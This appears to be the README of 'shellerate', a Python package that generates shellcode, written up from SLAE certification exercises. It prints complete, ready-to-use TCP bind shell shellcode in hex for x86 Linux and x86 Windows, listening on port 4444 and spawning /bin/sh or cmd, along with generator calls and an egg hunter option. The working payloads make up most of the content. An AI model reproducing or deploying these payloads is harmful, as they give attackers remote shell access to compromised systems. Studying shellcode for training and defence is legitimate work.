shellerate 0.4.3

A shellcode generator with encryption, encoding and polymorphism facilities built-in

Shellerate

Introduction

This the Changelog file for the shellerate project. 'shellerate' is pun between 'shell' and 'scellerato', the Italian word for 'wicked'.

'shellerate' is a shellcode generation framework born from the assignments I took for the SecurityTube Linux Assembly Expert certification process.

You can feature custom encoders, custom crypters, polymorphism and all stuff I learned in the SLAE certification process.

shellerate is Python3 package and supported architectures and operating system are limited to:

• x86/Linux
• x86/Win

Other architectures and operating systems will be added in the future.

Installation

To install shellerate to your system you can issue the following command:

pip install shellerate

Available payloads

TCP Bind shell shellcode

This shellcode will bind on a given port, waiting for clients and spawn a shell on the incoming connection.

Platform

At the moment, this shellcode is available only for x86/Linux platform.

Features

Feature	Supported
Encoding	Yes
Crypter	No
Egg Hunter	Yes

Usage

Basic usage:

from shellerate.bind_shellcode import *
b=BindShellcode(4444, 'x86', 'linux')
b.generate()
print("Shellcode: %s" % b.shellcode())
'\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\x31\\xc0\\x66\\xb8\\x69\\x01\\x31\\xc9\\x51\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc9\\x31\\xc0\\x66\\xb8\\x6b\\x01\\xcd\\x80\\x31\\xc0\\x66\\xb8\\x6c\\x01\\x51\\x89\\xce\\x89\\xe1\\x89\\xe2\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80'

If you want to create a bind shell shellcode for windows x86, you can call this way:

from shellerate.bind_shellcode import *
b=BindShellcode(4444, 'x86', 'win')
b.generate()
print("Shellcode: %s" % b.shellcode())
'\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\\xff\\xd5\\x6a\\x08\\x59\\x50\\xe2\\xfd\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\\xdf\\xe0\\xff\\xd5\\x97\\x68\\x02\\x00\\x11\\x5c\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\xc2\\xdb\\x37\\x67\\xff\\xd5\\x57\\x68\\xb7\\xe9\\x38\\xff\\xff\\xd5\\x57\\x68\\x74\\xec\\x3b\\xe1\\xff\\xd5\\x57\\x97\\x68\\x75\\x6e\\x4d\\x61\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5'

Usage with egg hunter

from shellerate.bind_shellcode import *
b=BindShellcode(4444, 'x86', 'linux')
b.egg_hunter()
b.generate()
sc = b.shellcode()

print("bindshell shellcode: " + b.shellcode())
print("egghunter shellcode: " + b.get_egg_hunter_code())